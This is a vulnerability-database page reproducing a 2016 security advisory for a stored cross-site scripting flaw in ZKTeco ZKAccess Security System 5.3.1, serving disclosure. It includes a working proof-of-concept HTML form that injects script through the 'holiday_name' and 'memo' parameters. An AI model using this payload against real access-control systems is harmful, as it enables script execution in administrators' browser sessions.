Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

ZKTeco ZKAccess Security System 5.3.1 Persistent Cross Site Scripting

🗓️ 31 Aug 2016 00:00:00Reported by LiquidWormType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 46 Views

ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability in 'holiday_name' and 'memo' parameter

Code
`i>>?<!--  
  
ZKTeco ZKAccess Security System 5.3.1 Stored XSS Vulnerability  
  
  
Vendor: ZKTeco Inc. | Xiamen ZKTeco Biometric Identification Technology Co.,ltd  
Product web page: http://www.zkteco.com  
Affected version: 5.3.12252  
  
Summary: ZKAccess Systems are built on flexible, open technology to provide  
management, real-time monitoring, and control of your access control system-all  
from a browser, with no additional software to install. Our secure Web-hosted  
infrastructure and centralized online administration reduce your IT costs and  
allow you to easily manage all of your access points in a single location. C3-100's  
versatile design features take care of present and future needs with ease and  
efficiency. It is one of the most rugged and reliable controllers on the market,  
with a multitude of built-in features. The C3-100 can communicate at 38.4 Kbps  
via RS-485 configuration or Ethernet TCP/IP networks. It can store up to 30,000  
cardholders.  
  
Desc: Input passed to the 'holiday_name' and 'memo' POST parameters is not properly  
sanitised before being returned to the user. This can be exploited to execute  
arbitrary HTML and script code in a user's browser session in context of an affected  
site.  
  
Tested on: CherryPy/3.1.0beta3 WSGI Server  
Firmware: AC Ver 4.1.9 3893-07 Jan 6 2016  
Python 2.6  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2016-5368  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5368.php  
  
  
18.07.2016  
  
-->  
  
  
<html>  
<body>  
<form action="http://127.0.0.1/data/iaccess/AccHolidays/_new_/?_lock=1" method="POST">  
<input type="hidden" name="pk" value="None" />  
<input type="hidden" name="holiday_name" value=""><script>alert(1)</script>" />  
<input type="hidden" name="holiday_type" value="1" />  
<input type="hidden" name="start_date" value="09/13/2016" />  
<input type="hidden" name="end_date" value="10/18/2016" />  
<input type="hidden" name="loop_by_year" value="2" />  
<input type="hidden" name="memo" value=""><script>alert(2)</script>" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2016 00:00Current
7.4High risk
Vulners AI Score7.4
zktecozkaccesscross site scriptingstored xssvulnerabilityweb-hostedadministrationrs-485tcp/ipgjoko krsticadvisorysecurity system
46